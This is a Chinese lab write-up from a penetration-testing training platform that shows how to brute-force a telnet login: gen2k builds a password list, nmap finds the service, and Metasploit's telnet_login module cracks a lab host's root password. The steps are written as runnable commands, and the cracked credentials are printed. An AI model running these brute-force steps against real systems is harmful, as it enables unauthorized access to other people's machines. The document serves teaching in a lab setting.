Metasploit批量验证爆破telnet

声明：以下内容均来自“实验吧”免费公益渗透平台，该平台至今仍旧在维护，估计~~，为此把以前保留的笔记拿来分享下。

[实验目的]

   1) 使用 枚举的方法 破解teInet登陆密码。（不懂枚举，可简单参考用户名枚举）

[实验原理]

   1) 利用 gen2k工具（字典生成工具）,根据收集来的信息,自动生成密码,使用枚举的方法破解 teInet登陆密码。

   2) 使用 nmap 扫描目标主机是否开启 telnet服务。

   3) 利用 Metasploit 暴破目标主机 telnet服务。

[实验环境]

[实验步骤]

一、利用gen2k工具生成密码表

1.1 使用gen2k工具生成密码表。单击桌面空白处,右键菜单选择"在终端中打开”。如图1所示
(#注：gen2k工具需要自己下载，且现在这个脚本已无法在源地址处获得，可考虑从其他获得，或者采用其他工具代替)

1.2 在终端中输入命令"cd /home" , 进入软件目录,在终端中输入命令"more user.txt"，查看已收集到的关键词文件"user.txt" , 利用此文件生成对应的密码。如图2所示

1.3.在终端中输入命令“python gen2k.py -n -y -z -e -c -w user.txt -o passwd.txt”，生成密码文件passwd.txt，在终端下输入命令“more passwd.txt”,查看生成的内容。

 

二、利用Metasploit暴破目标主机telnet服务

2.1 在终端中输入命令“nmap –sV 192.168.1.3”，扫描目标主机，发现目标主机开启telnet服务。

 

2.2 在终端中输入命令“msfconsole”，启动MSF终端。

 

2.3 在终端中输入命令“search telnet”，搜索telnet的相关工具和攻击载荷。

 

2.4 在终端中输入命令“use auxiliary/scanner/telnet/telnet_login”，启用漏洞利用模块, 提示符就会提示进入到该路径下。

2.5 在终端中输入命令“set RHOSTS 192.168.1.3”，设置目标主机的IP地址。

 

2.6 在终端中输入命令“set PASS_FILE /home/passwd.txt”，爆破时使用的密码文件为passwd.txt。

 

2.7 在终端中输入命令“set USER_FILE /home/user.txt”，爆破时使用的用户名文件为user.txt。

2.8 在终端中输入“exploit 192.168.1.3”, 对目标主机进行暴力破解。

2.9 在终端中显示成功对目标主机的telnet服务进行了破解，账号为root,密码:Simplexue123。

 

2.10 在终端中输入“telnet 192.168.1.3 ”,输入获取的账号root和密码Simplexue123,连接成功。

 

---

---

知识扩展：

telnet     ---》（端口：23）

Telnet协议是TCP/IP协议族中的一员，是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序，用它连接到服务器。终端使用者可以在telnet程序中输入命令，这些命令会在服务器上运行，就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话，必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。

工作过程

使用Telnet协议进行远程登录时需要满足以下条件：在本地计算机上必须装有包含Telnet协议的客户程序；必须知道远程主机的Ip地址或域名；必须知道登录标识与口令。

Telnet远程登录服务分为以下4个过程：

• 1）本地与远程主机建立连接。该过程实际上是建立一个TCP连接，用户必须知道远程主机的Ip地址或域名；
• 2）将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT（Net Virtual Terminal）格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据包；
• 3）将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端，包括输入命令回显和命令执行结果；
• 4）最后，本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。